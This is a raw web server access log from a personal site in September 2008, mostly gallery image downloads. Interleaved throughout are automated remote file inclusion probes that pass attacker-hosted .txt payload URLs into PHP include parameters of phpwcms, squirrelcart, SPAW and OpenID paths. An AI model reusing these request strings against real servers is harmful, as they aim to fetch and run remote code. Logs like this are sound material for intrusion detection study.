72.199.235.196 - - [20/Sep/2008:09:27:55 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-036_0.jpg HTTP/1.1" 200 433253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:00 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0105.jpg HTTP/1.1" 200 405751 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:28:03 -0700] "GET /errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:03 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0172.jpg HTTP/1.1" 200 364812 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:04 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-046_1.jpg HTTP/1.1" 200 226779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:05 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1025.jpg HTTP/1.1" 200 348080 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-049_1.jpg HTTP/1.1" 200 299273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:12 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0049.jpg HTTP/1.1" 200 421214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:15 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0170.jpg HTTP/1.1" 200 360510 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-277.jpg HTTP/1.1" 200 390300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:18 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1012.jpg HTTP/1.1" 200 280752 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-093_1.jpg HTTP/1.1" 200 315330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:25 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0128.jpg HTTP/1.1" 200 538292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-022_2.jpg HTTP/1.1" 200 529100 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:30 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1019.jpg HTTP/1.1" 200 410938 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-019_1.jpg HTTP/1.1" 200 350410 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:37 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0113.jpg HTTP/1.1" 200 312924 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
80.93.62.114 - - [20/Sep/2008:09:28:39 -0700] "GET /logs/access_080812.log//squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:39 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0143.jpg HTTP/1.1" 200 332772 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-014_4.jpg HTTP/1.1" 200 386585 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-134.jpg HTTP/1.1" 200 429690 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:28:46 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:28:47 -0700] "GET /logs/access_071202.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:28:47 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0014.jpg HTTP/1.1" 200 376404 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:51 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0156.jpg HTTP/1.1" 200 380022 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-139_1.jpg HTTP/1.1" 200 315499 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:28:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-281.jpg HTTP/1.1" 200 347085 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:02 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0126.jpg HTTP/1.1" 200 401657 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-026.jpg HTTP/1.1" 200 254857 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:14 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0089.jpg HTTP/1.1" 200 496294 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-018_0.jpg HTTP/1.1" 200 198343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.54.122 - - [20/Sep/2008:09:29:20 -0700] "GET /logs/access_080905.log/index.php?template=http://webmail.cyber.it/forums/ecodellemissioni/cache/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-013_4.jpg HTTP/1.1" 200 386724 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:26 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0154.jpg HTTP/1.1" 200 344712 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:27 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0065.jpg HTTP/1.1" 200 309498 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:30 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0109.jpg HTTP/1.1" 200 364454 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:34 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-263.jpg HTTP/1.1" 200 438268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
69.73.189.182 - - [20/Sep/2008:09:29:36 -0700] "GET //main.php?appserv_root=http://www.ezy-hosts.com//pages/posting??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.189.182 - - [20/Sep/2008:09:29:36 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://www.ezy-hosts.com//pages/posting??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.189.182 - - [20/Sep/2008:09:29:36 -0700] "GET /logs//main.php?appserv_root=http://www.ezy-hosts.com//pages/posting??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.189.182 - - [20/Sep/2008:09:29:36 -0700] "GET /logs/access_080711.log//main.php?appserv_root=http://www.ezy-hosts.com//pages/posting??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:29:37 -0700] "GET /logs/access_080601.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:39 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0175.jpg HTTP/1.1" 200 327600 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0084.jpg HTTP/1.1" 200 486728 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:29:43 -0700] "GET /logs/access_080408.log/pages.php?page=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:29:43 -0700] "GET /logs/pages.php?page=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:44 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0097.jpg HTTP/1.1" 200 349511 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.91.27.99 - - [20/Sep/2008:09:29:45 -0700] "GET /logs/index.php?inc_dir=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.225 - - [20/Sep/2008:09:29:45 -0700] "GET /logs/access_080219.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.11.244.85 - - [20/Sep/2008:09:29:47 -0700] "GET /logs/access_080402.log/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://inacio.info/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.11.244.85 - - [20/Sep/2008:09:29:47 -0700] "GET /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://inacio.info/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.11.244.85 - - [20/Sep/2008:09:29:47 -0700] "GET /logs/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://inacio.info/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-188.jpg HTTP/1.1" 200 484497 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.91.27.99 - - [20/Sep/2008:09:29:49 -0700] "GET /index.php?inc_dir=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 200 92431 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.244.85 - - [20/Sep/2008:09:29:51 -0700] "GET /logs/access_080427.log/inc/function.php?env[include_prefix]=http://inacio.info/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.11.244.85 - - [20/Sep/2008:09:29:51 -0700] "GET /inc/function.php?env[include_prefix]=http://inacio.info/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.11.244.85 - - [20/Sep/2008:09:29:51 -0700] "GET /logs/inc/function.php?env[include_prefix]=http://inacio.info/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:52 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0068.jpg HTTP/1.1" 200 386583 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.54.122 - - [20/Sep/2008:09:29:54 -0700] "GET /logs/access_080905.log/index.php?template=http://webmail.cyber.it/forums/ecodellemissioni/cache/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:29:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-021_0.jpg HTTP/1.1" 200 350673 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:00 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-198.jpg HTTP/1.1" 200 376218 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:04 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0150.jpg HTTP/1.1" 200 378254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
80.67.23.90 - - [20/Sep/2008:09:30:06 -0700] "GET /logs/access_080905.log//footer.php?footer_file=http://prestodoor.com/public_html/alb_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.90 - - [20/Sep/2008:09:30:06 -0700] "GET //footer.php?footer_file=http://prestodoor.com/public_html/alb_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.90 - - [20/Sep/2008:09:30:06 -0700] "GET /logs//footer.php?footer_file=http://prestodoor.com/public_html/alb_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:07 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0104.jpg HTTP/1.1" 200 449093 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-099.jpg HTTP/1.1" 200 644247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-250.jpg HTTP/1.1" 200 288530 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:17 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0144.jpg HTTP/1.1" 200 316667 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:20 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0028.jpg HTTP/1.1" 200 490791 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-132_1.jpg HTTP/1.1" 200 431720 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-040_1.jpg HTTP/1.1" 200 400011 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
80.93.62.114 - - [20/Sep/2008:09:30:32 -0700] "GET /logs/access_080405.log//tags.php?BBCodeFile=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:09:30:32 -0700] "GET //tags.php?BBCodeFile=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:09:30:33 -0700] "GET /logs//tags.php?BBCodeFile=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:35 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0079.jpg HTTP/1.1" 200 418779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.253.223.90 - - [20/Sep/2008:09:30:36 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [20/Sep/2008:09:30:37 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-031_1.jpg HTTP/1.1" 200 385379 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-208.jpg HTTP/1.1" 200 375523 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:30:47 -0700] "GET /errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0096.jpg HTTP/1.1" 200 43464 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-147.jpg HTTP/1.1" 200 398866 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:55 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-132_0.jpg HTTP/1.1" 200 305887 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:30:55 -0700] "GET /logs/access_080629.log/show.php?page=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:30:56 -0700] "GET /logs/show.php?page=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:30:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0136_0.jpg HTTP/1.1" 200 329003 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:30:57 -0700] "GET /logs/access_080602.log/show.php?page=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:02 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0072.jpg HTTP/1.1" 200 274927 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
80.67.23.90 - - [20/Sep/2008:09:31:05 -0700] "GET /logs/access_080816.log//footer.php?footer_file=http://prestodoor.com/public_html/alb_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-028_1.jpg HTTP/1.1" 200 321368 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-008_1.jpg HTTP/1.1" 200 558987 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:09:31:08 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:09:31:08 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:09:31:09 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:10 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0145.jpg HTTP/1.1" 200 330556 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:14 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0102.jpg HTTP/1.1" 200 477043 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.91.27.99 - - [20/Sep/2008:09:31:14 -0700] "GET /logs/access_080711.log/index.php?inc_dir=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.27.99 - - [20/Sep/2008:09:31:16 -0700] "GET /logs/access_080221.log/index.php?inc_dir=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-131_1.jpg HTTP/1.1" 200 427785 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.18.225 - - [20/Sep/2008:09:31:19 -0700] "GET /logs/access_080219.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-032_3.jpg HTTP/1.1" 200 401101 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:21 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0176.jpg HTTP/1.1" 200 328570 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:27 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0078.jpg HTTP/1.1" 200 334837 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-171_0.jpg HTTP/1.1" 200 322746 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
